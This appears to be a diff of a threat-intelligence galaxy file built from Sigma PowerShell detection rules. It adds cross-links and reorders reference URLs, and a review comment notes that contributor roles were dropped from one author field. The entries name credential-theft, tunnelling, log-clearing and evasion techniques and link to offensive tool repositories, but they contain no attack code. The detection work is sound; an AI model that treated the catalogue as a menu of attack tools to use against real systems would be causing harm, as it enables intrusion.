@@ -20517,6 +25753,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", "value": "NTFS Alternate Data Stream" }, @@ -20558,8 +25810,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ @@ -20567,6 +25819,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "value": "Powershell Create Scheduled Task" }, 
@@ -20583,8 +25844,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -20592,6 +25853,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", "value": "Powershell Timestomp" }, @@ -20616,6 +25886,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "value": "PowerShell PSAttack" }, @@ -20641,6 +25920,15 @@ "attack.t1564.006" ] }, + "related": [ + { + "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "value": "Suspicious Hyper-V Cmdlets" }, @@ -20691,6 +25979,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "value": "Create Volume Shadow Copy with Powershell" }, 
@@ -20716,6 +26013,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "value": "Enable Windows Remote Management" }, @@ -20755,9 +26061,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -20765,6 +26071,15 @@ "attack.t1070.001" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", "value": "Suspicious Eventlog Clear" }, @@ -20789,6 +26104,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", "value": "Suspicious Get Information for SMB Share" }, 
@@ -20834,6 +26158,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "value": "Malicious ShellIntel PowerShell Commandlets" }, @@ -20851,8 +26184,8 @@ "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -20860,6 +26193,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "value": "WMIC Unquoted Services Path Lookup - PowerShell" }, @@ -20911,6 +26253,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", "value": "Suspicious Invoke-Item From Mount-DiskImage" }, @@ -20935,6 +26286,15 @@ "attack.t1114.001" ] }, + "related": [ + { + "dest-uuid": "1e9eb839-294b-48cc-b0d3-c45555a2a004", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "value": "Powershell Local Email Collection" }, 
@@ -20976,8 +26336,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ @@ -21001,8 +26361,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" ], "tags": [ @@ -21010,6 +26370,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", "value": "Execution via CL_Invocation.ps1 (2 Lines)" }, @@ -21034,6 +26403,15 @@ "attack.t1560" ] }, + "related": [ + { + "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", "value": "Data Compressed - PowerShell" }, 
@@ -21075,8 +26453,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -21110,6 +26488,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", "value": "Potential Invoke-Mimikatz PowerShell Script" }, @@ -21135,6 +26522,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "value": "Troubleshooting Pack Cmdlet Execution" }, @@ -21160,6 +26556,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "value": "Execution via CL_Mutexverifiers.ps1" }, @@ -21235,6 +26640,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "value": "Invoke-Obfuscation Via Use Clip - Powershell" }, 
@@ -21284,6 +26698,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", "value": "Suspicious Mount-DiskImage" }, @@ -21300,10 +26723,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", - "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -21311,6 +26734,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "value": "Suspicious PowerShell Keywords" }, @@ -21335,6 +26767,15 @@ "attack.t1119" ] }, + "related": [ + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", "value": "Recon Information for Export with PowerShell" }, 
@@ -21375,8 +26816,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", + "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ @@ -21384,6 +26825,15 @@ "attack.t1201" ] }, + "related": [ + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy" }, @@ -21400,8 +26850,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ 
@@ -21409,6 +26859,15 @@
 "attack.t1036.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0718cd72-f316-4aa2-988f-838ea8533277",
 "value": "Suspicious Start-Process PassThru"
 },
@@ -21433,6 +26892,15 @@
 "attack.t1531"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107",
 "value": "Remove Account From Domain Admin Group"
 },
@@ -21457,6 +26925,15 @@
 "attack.t1070.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0",
 "value": "PowerShell Deleted Mounted Share"
 },
@@ -21481,6 +26958,15 @@
 "attack.t1090"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bd33d2aa-497e-4651-9893-5c5364646595",
 "value": "Suspicious TCP Tunnel Via PowerShell Script"
 },
@@ -21508,6 +26994,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd",
 "value": "PowerShell ShellCode"
 },
@@ -21533,6 +27028,15 @@
 "attack.t1552.004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c",
 "value": "Suspicious Export-PfxCertificate"
 },
@@ -21557,6 +27061,15 @@
 "attack.t1069.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb",
 "value": "Suspicious Get Local Groups Information - PowerShell"
 },
@@ -21581,6 +27094,15 @@
 "attack.t1074.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9",
 "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script"
 },
@@ -21598,8 +27120,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
- "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
 "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
+ "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml"
 ],
 "tags": [
@@ -21622,10 +27144,10 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
+ "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content",
 "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
 "https://twitter.com/ScumBots/status/1610626724257046529",
- "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content",
+ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml"
 ],
 "tags": [
@@ -21650,8 +27172,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process",
 "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml"
 ],
 "tags": [
@@ -21683,6 +27205,15 @@
 "attack.t1070.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d",
 "value": "Clear PowerShell History - PowerShell"
 },
@@ -21707,6 +27238,15 @@
 "attack.t1069.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee",
 "value": "Active Directory Group Enumeration With Get-AdGroup"
 },
@@ -21754,13 +27294,29 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43",
 "value": "Dnscat Execution"
 },
 {
 "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
 "meta": {
- "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update), Max Altgelt (update), Tobias Michalski (update), Austin Songer (@austinsonger) (update)",
+ "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer",
 "creation_date": "2017/03/05",
 "falsepositive": [
 "Unknown"
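Review bot: The rewritten `author` string for Malicious PowerShell Commandlets drops the per-contributor role annotations (`(source)`, `(rule)`, `(update)`, `(fp)`) that the old value carried, so the galaxy no longer records who wrote the rule versus who later tuned it. I cannot tell from the hunk whether this mirrors a change in the upstream Sigma rule or a normalisation step in the generator; if it is the generator, the author field should be copied verbatim, because in this galaxy it is provenance rather than a display string. The `related` block for Dnscat Execution earlier in the same hunk is consistent with its neighbours; the entry it opens continues past the end of the hunk.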
@@ -21770,17 +27326,19 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
 "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://adsecurity.org/?p=2921",
- "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
 "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
+ "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml"
 ],
 "tags": [
@@ -21796,6 +27354,43 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6",
 "value": "Malicious PowerShell Commandlets - ScriptBlock"
 },
@@ -21822,6 +27417,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e54f5149-6ba3-49cf-b153-070d24679126",
 "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell"
 },
@@ -21838,9 +27442,9 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
 "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/",
 "https://www.shellhacks.com/clear-history-powershell/",
+ "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml"
 ],
 "tags": [
@@ -21849,6 +27453,15 @@
 "attack.t1070.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7",
 "value": "Clearing Windows Console History"
 },
@@ -21873,6 +27486,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b",
 "value": "Powershell XML Execute Command"
 },
@@ -21896,6 +27518,15 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71",
 "value": "Suspicious PowerShell Invocations - Specific"
 },
@@ -21922,6 +27553,22 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88",
 "value": "Windows Defender Exclusions Added - PowerShell"
 },
@@ -21938,8 +27585,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
 "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
 "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
